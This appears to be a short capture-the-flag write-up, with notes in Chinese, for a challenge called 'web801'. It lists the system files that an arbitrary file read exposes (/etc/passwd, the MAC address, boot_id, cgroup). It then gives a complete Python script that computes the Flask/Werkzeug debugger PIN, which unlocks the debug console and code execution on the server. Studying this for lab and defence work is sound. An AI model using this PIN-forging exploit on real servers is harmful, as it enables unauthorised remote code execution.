web801

可以读文件,查看本地进程

/proc/self/cmdline

可见是个py程序

python后台地址/app/app.py

/etc/passwd

/usr/local/lib/python3.8/site-packages/flask/app.py

/sys/class/net/eth0/address

/proc/sys/kernel/random/boot_id

/proc/self/cgroup

import hashlib
import getpass
from flask import Flask
from itertools import chain
import sys
import uuid
import typing as t
username='root' #/etc/passwd
app = Flask(__name__)
modname= getattr(app, "__module__", t.cast(object, app).__class__.__module__)
mod=sys.modules.get(modname)
mod = getattr(mod, "__file__", None)

probably_public_bits = [
    username, #用户名
    modname,  #一般固定为flask.app
    getattr(app, "__name__", app.__class__.__name__), #固定，一般为Flask
    '/usr/local/lib/python3.8/site-packages/flask/app.py',   #主程序（app.py）运行的绝对路径
]
print(probably_public_bits)
mac ='02:42:ac:0c:e4:fe'.replace(':','')#/sys/class/net/eth0/address
mac=str(int(mac,base=16))
private_bits = [
   mac,#mac地址十进制
 "653dc458-4634-42b1-9a7a-b22a082e1fcecb3154994b94a4a667e472248cb1a254df7e0b46987a3056cca25a996dde7c97" #/proc/sys/kernel/random/boot_id /proc/self/cgroup
     ]
print(private_bits)
h = hashlib.sha1()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode("utf-8")
    h.update(bit)
h.update(b"cookiesalt")

cookie_name = f"__wzd{h.hexdigest()[:20]}"

# If we need to generate a pin we salt it a bit more so that we don't
# end up with the same value and generate out 9 digits
h.update(b"pinsalt")
num = f"{int(h.hexdigest(), 16):09d}"[:9]

# Format the pincode in groups of digits for easier remembering if
# we don't have a result yet.
rv=None
if rv is None:
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            rv = "-".join(
                num[x : x + group_size].rjust(group_size, "0")
                for x in range(0, len(num), group_size)
            )
            break
    else:
        rv = num

print(rv)